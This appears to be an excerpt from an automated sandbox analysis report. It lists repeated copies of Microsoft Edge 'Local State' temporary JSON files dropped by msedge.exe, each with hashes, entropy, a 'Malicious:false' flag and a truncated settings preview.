                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF23bc7.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF23c44.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF243e5.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF26a49.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF27c5a.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF27f77.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF27f96.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2a2dd.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF34edc.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44236
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089528572478857
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kTTKKGf4SWtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yntt5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                      MD5:7CC1A5BB3CFE3687E4325D06494CEAEB
                                                                                                                                                                                                                                                                                                      SHA1:BA0B5D09796EB7F6DB687E7FCA5F3F9A57A90FD5
                                                                                                                                                                                                                                                                                                      SHA-256:774A8D61127959FE41268080EB4857DBC4CEE867EBBE4DFA6B25A4F408B316F9
                                                                                                                                                                                                                                                                                                      SHA-512:031FFC9E3F073345C809FF4043FCC90C2A008B6BFFA91898F47C6A75FE2A74344DE9FC5AA3E355B25BA61A688DE33CAC1C9CB560F31A119FA82331C09847BB2A
                                                                                                                                                                                                                                                                                                      Malicious:false
